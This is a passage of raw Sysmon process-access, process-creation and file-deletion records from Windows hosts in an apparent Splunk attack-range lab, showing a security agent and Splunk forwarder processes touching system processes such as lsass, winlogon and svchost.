Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.730{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.724{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.693{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.628{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7FC90E4A8AD596BB7E4ABC262E6E1D,SHA256=40C71D7ED7A24675B6AD7E53FBBFC16BA4F30BF88474CEDC27CF01AA794839E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018023Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.761{E5A8D418-E5B3-63C7-2A02-00000000B002}13923484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018022Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5B3-63C7-2A02-00000000B002}1392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018021Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018020Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018019Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018018Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018017Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018016Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018015Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018014Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018013Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018012Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E5B3-63C7-2A02-00000000B002}1392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018011Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.620{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5B3-63C7-2A02-00000000B002}1392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018010Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.621{E5A8D418-E5B3-63C7-2A02-00000000B002}1392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018009Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:31.562{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC6AD5B284BC3E80E868051EC61E76B,SHA256=F1F12BCE92BF82D67DB8C53E3C682CEA5A779A550846D6ED8AA20622A1299063,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.336{FE4C2B44-E5B3-63C7-7406-00000000AF02}22286720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.179{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5B3-63C7-7406-00000000AF02}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 